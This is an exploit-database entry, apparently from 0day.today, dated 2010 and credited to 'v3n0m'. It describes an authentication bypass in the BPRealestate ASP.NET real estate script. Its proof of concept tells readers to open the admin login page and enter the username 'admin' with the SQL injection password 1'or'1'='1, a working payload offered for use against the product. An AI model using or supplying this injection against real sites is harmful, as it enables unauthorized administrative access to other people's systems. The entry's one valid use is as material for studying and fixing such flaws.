id: 14875
date: 11/17/2010
title: BPRealestate Real Estate Authentication Bypass Vulnerability
author: v3n0m
cves: 

============================================================
BPRealestate Real Estate Authentication Bypass Vulnerability
============================================================

Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : November, 16-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
 
Application : BPRealestate - Real Estate site script - ASP.NET AJAX
Price       : $24.90
Vendor      : http://www.bpowerhouse.info/
 
Exploit & p0c
_____________
 
go to
    http://127.0.0.1/[path]/admin
 
then login with
    Username : admin
    Password : 1'or'1'='1



#  0day.today [2023-03-23]  #